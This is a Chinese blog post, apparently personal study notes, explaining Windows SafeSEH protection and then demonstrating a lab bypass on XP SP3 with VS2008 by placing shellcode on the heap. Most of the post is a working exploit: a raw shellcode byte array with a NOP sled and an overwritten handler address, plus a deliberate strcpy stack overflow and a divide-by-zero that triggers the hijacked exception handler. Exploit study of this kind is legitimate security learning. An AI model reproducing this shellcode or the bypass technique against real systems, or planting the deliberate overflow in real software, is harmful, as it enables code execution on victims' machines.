zcc1414

博客园 首页 联系 订阅 管理

SafeSEH 原理:在程序调用异常处理函数前,对要调用的的异常处理函数进行一系列的有效性检测

VS2003后续版本  默认启用的

编译器将所有的额SEH中所有的异常处理函数的值提取出来编入一张安全SEH 表

将这张表放到程序的映像中

当程序调用异常处理的时候会将函数地址与安全SEH表进行匹配 检查调用的异常处理函数是否位于安全SEH表

VS2008 命令行:

好像只有release版本能行

dumpbin /loadconfig 程序



SfeSEH机制 保护:

检查的重点是

1在加载模块中 ,是否存在  Load Configuration Directory  如果没有就可以执行

2是否在加载模块地址范围之外,在之外就可以执行

3栈中地址覆盖SEH不会执行,但是堆中地址可以执行

1  检查异常处理链是否位于当前程序栈中,如果不在当前栈中,程序会终止异常处理函数的调用


2 检查异常处理函数指针是否指向当前程序栈中,指向程序栈就终止异常处理函数的调用


3 经过前面两项检查后,程序调用一个全新的函数  RtlIsValidHandler(),来对异常处理函数的有效性进行验证

····看书吧  太多了



下面才开始进行本次的实验:

SEH的异常处理函数指向 堆区

及时发现了SEH不可信  仍然会调用其已被修改过的异常处理函数

因此只要将shellcode不知道堆区中就可以直接跳转执行了。 SafeSEH对堆区是特殊处理的,shellcode没用放在栈中而是放在堆中!!!


/*
XP SP3   
VS2008   SafeSEH 保护  
从堆中绕过 SafeSEH:
*/
#include <stdafx.h>
#include <windows.h>

char shellcode[]=

"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53"
"\x68\x64\x61\x30\x23"
"\x68\x23\x50\x61\x6E"
"\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"//168

"\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90"
"\xB8\x31\x39\x00"
//003931B8
;


void test(char *input)
{
	char str[200];
	strcpy(str,input);
	int zero = 0;
	zero = 1/ zero;
}

int main()
{
	char * buf = (char *)malloc(500);
	//__asm int 3
	strcpy(buf,shellcode);
	test(buf);
}



posted on 2013-09-09 00:05  zcc1414  阅读(382)  评论(0编辑  收藏  举报